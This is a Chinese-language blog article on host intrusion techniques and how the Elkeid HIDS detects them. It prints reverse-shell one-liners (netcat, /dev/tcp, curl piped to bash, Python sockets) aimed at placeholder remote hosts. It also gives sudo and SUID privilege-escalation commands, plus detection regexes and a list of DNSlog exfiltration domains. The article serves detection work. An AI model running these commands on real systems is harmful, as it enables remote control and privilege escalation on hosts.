主机安全-进程、命令攻击与检测

目录


概述

本文更新通过在主机(不含容器)上直接执行命令或启动进程来攻击的场景。检测方面以字节跳动的开源HIDS elkeid举例。每种检测仅举一个例子,其余的给出示例payload。

反弹shell

原理

控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端

nc

bash 复制代码
nc 远程ip 端口 -e /bin/bash

Elkeid规则如下:

bash 复制代码
(?:\bnc(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.openbsd(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.traditional(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.linux(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnetcat(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*))

/dev/xxx反弹shell

指的是通过/dev/tcp或/dev/udp的方式建立连接反弹shell,举例:

bash 复制代码
bash -i >& /dev/tcp/远程ip/端口 0>&1

下载不落地反弹Shell

指的是下载后通过管道等方式执行,不落地,举例:

bash 复制代码
curl/wget http://xxx.sh | bash

各种语言反弹shell

以Python为例:

python 复制代码
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("远程ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

linux提权

sudo

原理:临时赋予root权限运行某个程序

bash 复制代码
sudo less file_path
bash 复制代码
!bash


suid提权

bash 复制代码
chmod u+s filename 设置SUID位
chmod u-s filename 去掉SUID设置

收集具有suid的文件

bash 复制代码
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

mysql提权

  • udf提权
  • 写入webshell提权
  • mof提权

Dnslog

Elkeid规则如下:

bash 复制代码
.awvsscan119.autoverify.cn|.cybertunnel.run|.dnstunnel.run|.s0x.cn|.dns.1433.eu.org|.logplog.eu.org|.ns.dns3.cf|.vuleye.pw|.ceye.io|.exeye.io|.vcap.me|.xip.name|.xip.io|.sslip.io|.nip.io|.burpcollaborator.net|.tu4.org|.2xss.cc|.bxss.me|.godns.vip|.0kee.360.cn|.r87.me|.ngrok.io|.xn--9tr.com|.pipedream.net|.vxtrans.com|.vxtrans.link|.hopto.org|.zapto.org|.sytes.net|.ddns.net


参考

linux提权
反弹Shell原理及检测技术研究

相关推荐
麦兜*2 分钟前
Spring Boot 与 Ollama 集成部署私有LLM服务 的完整避坑指南,涵盖 环境配置、模型管理、性能优化 和 安全加固
java·spring boot·后端·安全·spring cloud·性能优化
athink_cn27 分钟前
【紧急预警】NVIDIA Triton推理服务器漏洞链可导致RCE!
人工智能·安全·网络安全·ai
dingzd953 小时前
从传统架构到创新安全:Web2.0与Web3.0的比较分析
安全·架构·web3·facebook·tiktok·instagram·clonbrowser
q__y__L8 小时前
C#线程同步(三)线程安全
安全·性能优化·c#
大学在校生,求offer联系15 小时前
墨者学院SQL过滤字符后手工绕过漏洞测试(万能口令)
安全
字节跳动安全中心16 小时前
猎影计划:从密流中捕获 Cobalt Strike 的隐秘身影
人工智能·安全·llm
集成显卡16 小时前
网络安全 | 从 0 到 1 了解 WAF:Web 应用防火墙到底是什么?
网络·安全·web安全
FreeBuf_16 小时前
AI Agents漏洞百出,恶意提示等安全缺陷令人担忧
人工智能·安全
AORO202518 小时前
国产智能三防手机哪款最好?这款支持单北斗、5G-A、IP68
5g·安全·智能手机·信息与通信·harmonyos
wanhengidc18 小时前
进一步分析云手机的优势有哪些?
网络·安全·智能手机